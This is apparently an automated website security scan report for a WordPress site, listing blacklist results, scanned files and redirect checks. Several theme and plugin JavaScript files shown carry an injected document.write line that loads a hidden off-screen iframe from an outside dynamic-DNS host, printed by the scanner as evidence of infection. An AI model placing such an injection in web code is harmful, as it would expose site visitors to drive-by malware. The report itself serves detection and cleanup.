Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zionsafehaven.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://zionsafehaven.org/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zionsafehaven.org/ | 200 OK Content-Length: 8199 Content-Type: text/html | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/custom.js?ver=1 | 200 OK Content-Length: 4655 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged by the scanner; the part that does not belong to the original script is the final document.write(...) statement, which adds a 70x70 iframe positioned off-screen (left:-550px), and the same statement is appended to every file flagged malicious in this report.
jQuery.fn.rdy = function(func) { this.length && func.apply(this); return this; }; function getParameterByName(name, hash) { var url = hash ? window.location.hash.replace('#', '?') : window.location.search; var match = RegExp('[?&]' + name + '=([^&]*)').exec(url); return match && decodeURIComponent(match[1].replace(/\+/g, ' ')); } jQuery.fn.placeHolder = function(default_value) { var el = jQuery(this); default_value return false; }); }); $("ul.nav").superfish({ delay: 200, animation: { opacity: 'show', height: 'show' }, speed: 'fast', autoArrows: false }); }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>');
Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 27329 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit process - no element selected'); return this; } var method, action, url, $form = this; if (typeof options == 'function') { options = { success: options }; } method = this.attr('method'); action = this.attr('action'); url = (typeof action === 'string') ? $.trim(action) : ''; url = url || window.location.href || ''; var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } }; })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/contact-form-7/scripts.js?ver=3.0.1 | 200 OK Content-Length: 5980 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) {
$(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 === null) _wpcf7 = {}; _wpcf7 = $.extend({ cached: 0 }, _wpcf7); $('div.wpcf7 > form').ajaxForm({ beforeSubmit: function(formData, jqForm, options) { jqForm.wpcf7ClearResponseOutput(); jqForm.find('img.ajax-loader').css({ visibility: 'visible' }); return true; }, beforeSerialize: function(jqForm, $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery);;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/test404page.js | 404 Not Found Content-Length: 7996 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js?ver=4.0 | 200 OK Content-Length: 95786 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/superfish.js?ver=4.0 | 200 OK Content-Length: 3892 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/jquery.quicksand.min.js?ver=4.0 | 200 OK Content-Length: 3478 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/easing.js?ver=4.0 | 200 OK Content-Length: 8275 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/themes/cascadia/js/slides.js?ver=4.0 | 200 OK Content-Length: 8186 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){$.fn.slides=function(g){g=$.extend({},$.fn.slides.option,g);return this.each(function(){$('.'+g.container,$(this)).children().wrapAll('<div class="slides_control"/>');var d=$(this),control=$('.slides_control',d),total=control.children().size(),width=control.children().outerWidth(),height=control.children().outerHeight(),start=g.start-1,effect=g.effect.indexOf(',')<0?g.effect:g.effect.replace(' ','').split(',')[0],paginationEffect=g.effect.indexOf(',')<0?effect:g.effect.r ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/login-box/login-box-script.js | 200 OK Content-Length: 1590 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function loginbox_show() { if (loginbox.fade) { jQuery("#loginbox").fadeIn(); } else { jQuery("#loginbox").show(); } jQuery("#user_login").focus(); } function loginbox_hide() { if (loginbox.fade) { jQuery("#loginbox").fadeOut(); } else { jQuery("#loginbox").hide(); } } function loginbox_toggle() { if (jQuery("#loginbox").css("display") == "none") { loginbox_show(); } else { lbkey.indexOf(key) != -1 ? keye = true : keye = false; if (keye && lbauxkey) { loginbox_toggle(); return false; }; }); jQuery(function() { jQuery("[rel*='loginbox-toggle']").click(function(){ loginbox_toggle(); return false; }); }); ;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/wp-content/plugins/login-box/wpclassic/scripts.js | 200 OK Content-Length: 777 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(function() { boxwidth = 380; boxheight = 400; windowwidth = self.innerWidth || jQuery.boxModel && document.documentElement.clientWidth || document.body.clientWidth; windowheight = self.innerHeight || jQuery.boxModel && document.documentElement.clientHeight || document.body.clientHeight; posx = (windowwidth - boxwidth) / 2; posy = (windowheight - boxheight) / 2; jQuery("#loginbox").css({ left: posx + "px", top: posy + "px" }); });;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://rmehcsyq.ddns.name/ff11ba09b3616adb8a2f6d93.KAK4ST18?default" height="70" width="70"></iframe>'); Antivirus reports:
| ||
http://www.zionsafehaven.org/project/portfolio-post-number-one/ | 200 OK Content-Length: 12133 Content-Type: text/html | clean |
http://www.zionsafehaven.org/wp-includes/js/comment-reply.min.js?ver=4.0 | 200 OK Content-Length: 757 Content-Type: text/javascript | clean |
http://www.zionsafehaven.org/project/portfolio-post-number-four/ | 200 OK Content-Length: 11870 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zionsafehaven.org
Result:
GET / HTTP/1.1
Host: zionsafehaven.org
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zionsafehaven.org
Referer: http://www.google.com/search?q=zionsafehaven.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zionsafehaven.org
Referer: http://www.google.com/search?q=zionsafehaven.org
Result:
The result is similar to the first query. There are no suspicious redirects found.